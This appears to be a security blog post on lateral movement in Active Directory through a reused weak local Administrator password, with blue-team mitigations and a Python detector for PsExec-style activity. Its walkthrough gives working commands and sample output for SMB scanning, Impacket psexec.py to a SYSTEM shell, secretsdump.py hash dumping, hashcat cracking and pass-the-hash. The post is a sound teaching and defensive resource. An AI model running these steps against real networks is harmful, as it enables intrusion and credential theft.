How a Weak Local Administrator Configuration in AD Can Lead to Lateral Movement
In many Active Directory (AD) environments, PCs are domain-joined by staff with little security training. The result is often a set of misconfigurations that lets an attacker who lands on one workstation move laterally to every other one.
Real-World Scenario
In a recent observation, I found an organization where PCs were added to the domain using the following steps:
- A local admin account was created:
  - Username: Administrator
  - Password: P@ssw0rd123 (very weak and reused on every PC)
- Using this Administrator account, a normal user account was created for workstation use:
  - Example: Manager_HR
- The domain was joined from the normal user account.
What This Means
- Every PC has a predictable local admin account (Administrator, the built-in RID 500 account) with a weak password that is identical on every machine.
- SMB and file sharing are enabled on some machines, so the administrative shares (ADMIN$, C$) are reachable over TCP 445.
- No LAPS or GPO-driven process randomizes the local admin password per machine.
This makes it trivial for an attacker to pivot across the network once a single machine is compromised: the same credential works on every host.
Attacker Prerequisites
The attacker:
- Is on the same internal network (a Kali machine or a rogue device)
- Can enumerate Windows hosts via SMB or ping sweeps
- Finds open SMB ports (445) on several machines
Attack Walkthrough
1. Nmap Scan from Attacker Machine
A simple scan using Nmap reveals multiple Windows hosts with port 445 open:
nmap -p 445 --open -T4 192.168.0.0/24
Result (one of the hosts found):
Host: 192.168.0.151
PORT    STATE SERVICE
445/tcp open  microsoft-ds
2. PsExec via Impacket from Kali
If the attacker knows the reused local admin credentials (Administrator:P@ssw0rd123), they can run:
python3 /usr/share/doc/python3-impacket/examples/psexec.py 'Administrator:P@ssw0rd123@192.168.0.151'
Impacket's target syntax is [domain/]user[:password]@host, so no Windows-style `.\` prefix is needed; with no domain given the account is authenticated locally on the target. On Kali the same script is also available as the impacket-psexec wrapper.
Result:
[*] Found writable share ADMIN$
[*] Starting service...
C:\Windows\system32>
Boom: a SYSTEM shell on a domain-joined Windows 10 machine. psexec.py uploads a service binary to ADMIN$ and starts it as a Windows service, so the shell runs as LocalSystem rather than as the Administrator account itself.
3. System & Domain Enumeration
Once in, the attacker can enumerate:
whoami /all
ipconfig /all
systeminfo
net config workstation
net user /domain
net group "Domain Admins" /domain
This gives the attacker:
- SYSTEM privileges on the workstation
- The domain name
- Domain controller information
- Active domain user accounts and groups (the /domain queries succeed from the SYSTEM context because the workstation's computer account is itself a domain member)
4. Dumping Hashes with secretsdump.py
From Kali, the attacker runs:
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py 'Administrator:P@ssw0rd123@192.168.0.151'
Result:
[*] Dumping local SAM hashes
User1:1000:aad3...:6597d9fe8469e21d840e2cbff8d43c8b:::
...
[*] Dumping LSA Secrets
[*] Dumping cached domain logon information
5. Cracking Passwords with Hashcat
The NTLM hash 6597d9fe8469e21d840e2cbff8d43c8b is cracked using:
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt --force
Result:
6597d9fe8469e21d840e2cbff8d43c8b:Test@1234
You now have the plaintext password of a local user. If it is reused elsewhere, you can pivot to other machines or escalate towards domain admin through additional paths. Cracking is not even required for the Administrator account: psexec.py and secretsdump.py accept the NT hash directly via the -hashes LMHASH:NTHASH option (pass-the-hash), so every host whose SAM holds the same NT hash is already reachable.
Lesson for Blue Teams
- Never reuse local admin passwords: deploy LAPS (Windows LAPS or the legacy LAPS client) so every machine gets a unique, regularly rotated password stored in AD.
- Enforce complex passwords and disable the built-in RID 500 Administrator account. UAC remote restrictions (LocalAccountTokenFilterPolicy) strip the admin token from other local accounts over the network but not from the RID 500 account unless FilterAdministratorToken is enabled, which is exactly why this account is the preferred target.
- Deny network logon for local accounts with the "Deny access to this computer from the network" user right applied to the well-known SIDs S-1-5-113 (Local account) and S-1-5-114 (Local account and member of Administrators group).
- Block SMB (TCP 445) and the administrative shares (ADMIN$, C$) between workstations with host firewall rules where not required; workstations rarely need to talk to each other over SMB.
- Monitor for psexec-style behavior and lateral movement: Event ID 7045 (service installed, especially PSEXESVC or a randomly named binary under %SystemRoot%), 4624 logon type 3 with a local account, and 5145 access to ADMIN$.
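The monitoring bullet above, as an added example that is not part of the original post: a small Python detector run over constructed Windows event records. It assumes one dict per event with the field names shown, taken from the Security log (4624 network logon, 5145 detailed file share) and the System log (7045 service installed); 5145 only fires when "Audit Detailed File Share" is enabled, and the random-name length used for Impacket's dropped binary is a heuristic, not a documented constant.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: one attacker at 192.168.0.55 hitting two workstations
# with the shared local Administrator password, plus two benign events.
EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4624, "host": "HR-PC-01", "LogonType": 3,
     "TargetUserName": "Administrator", "TargetDomainName": "HR-PC-01", "IpAddress": "192.168.0.55"},
    {"time": "2024-05-01T10:00:01", "id": 5145, "host": "HR-PC-01", "ShareName": "\\\\*\\ADMIN$",
     "SubjectUserName": "Administrator", "IpAddress": "192.168.0.55", "RelativeTargetName": "xKqT.exe"},
    {"time": "2024-05-01T10:00:02", "id": 7045, "host": "HR-PC-01", "ServiceName": "xKqT",
     "ImagePath": "%SystemRoot%\\xKqT.exe"},
    {"time": "2024-05-01T10:03:00", "id": 4624, "host": "FIN-PC-02", "LogonType": 3,
     "TargetUserName": "Administrator", "TargetDomainName": "FIN-PC-02", "IpAddress": "192.168.0.55"},
    {"time": "2024-05-01T10:03:01", "id": 7045, "host": "FIN-PC-02", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # benign: a domain user over the network, and a legitimate service registration
    {"time": "2024-05-01T10:05:00", "id": 4624, "host": "FIN-PC-02", "LogonType": 3,
     "TargetUserName": "jdoe", "TargetDomainName": "CORP", "IpAddress": "192.168.0.10"},
    {"time": "2024-05-01T10:06:00", "id": 7045, "host": "FIN-PC-02", "ServiceName": "Sense",
     "ImagePath": "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\""},
]


def _t(e):
    return datetime.fromisoformat(e["time"])


def local_admin_network_logons(events):
    """4624 logon type 3 where the account is local to the target (domain == hostname)
    and is Administrator: the signature of psexec.py with the shared local password."""
    return [e for e in events
            if e["id"] == 4624 and e.get("LogonType") == 3
            and e["TargetDomainName"].upper() == e["host"].upper()
            and e["TargetUserName"].lower() == "administrator"]


def admin_share_exe_writes(events):
    """5145 access to ADMIN$ where the object is an .exe (the service binary upload)."""
    return [e for e in events
            if e["id"] == 5145 and e.get("ShareName", "").upper().endswith("ADMIN$")
            and e.get("RelativeTargetName", "").lower().endswith(".exe")]


# Sysinternals PsExec installs PSEXESVC; Impacket's psexec.py drops a randomly named
# executable directly in %SystemRoot% (the ADMIN$ root). The 4-8 letter length is an
# assumption for this example.
_RANDOM_ROOT_EXE = re.compile(r"%systemroot%\\[a-z]{4,8}\.exe")


def suspicious_service_installs(events):
    out = []
    for e in events:
        if e["id"] != 7045:
            continue
        path = e.get("ImagePath", "").lower()
        if e.get("ServiceName", "").upper() == "PSEXESVC" or _RANDOM_ROOT_EXE.fullmatch(path):
            out.append(e)
    return out


def spray_sources(events, window=timedelta(minutes=15), min_hosts=2):
    """One source IP using a local Administrator account on >= min_hosts distinct hosts
    inside the window: a reused-password pivot rather than a single admin task."""
    by_ip = defaultdict(list)
    for e in local_admin_network_logons(events):
        by_ip[e["IpAddress"]].append(e)
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=_t)
        for i, first in enumerate(evs):
            hosts = {e["host"] for e in evs[i:] if _t(e) - _t(first) <= window}
            if len(hosts) >= min_hosts:
                hits[ip] = sorted(hosts)
                break
    return hits


if __name__ == "__main__":
    for e in suspicious_service_installs(EVENTS):
        print(f"[7045] {e['host']}: service {e['ServiceName']} -> {e['ImagePath']}")
    for e in admin_share_exe_writes(EVENTS):
        print(f"[5145] {e['host']}: {e['IpAddress']} wrote {e['RelativeTargetName']} to ADMIN$")
    for ip, hosts in spray_sources(EVENTS).items():
        print(f"[spray] {ip} used local Administrator on {', '.join(hosts)}")
```

The single-host rules are noisy on their own (help-desk tooling also installs services), so the correlation in spray_sources is the one to alert on: after LAPS is deployed, one source reaching several hosts with the local Administrator account inside a short window should not happen at all.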
Final Thought
One bad configuration, like a reused local admin password, can unravel your entire domain. Start with the basics. Secure the endpoints, then build upward.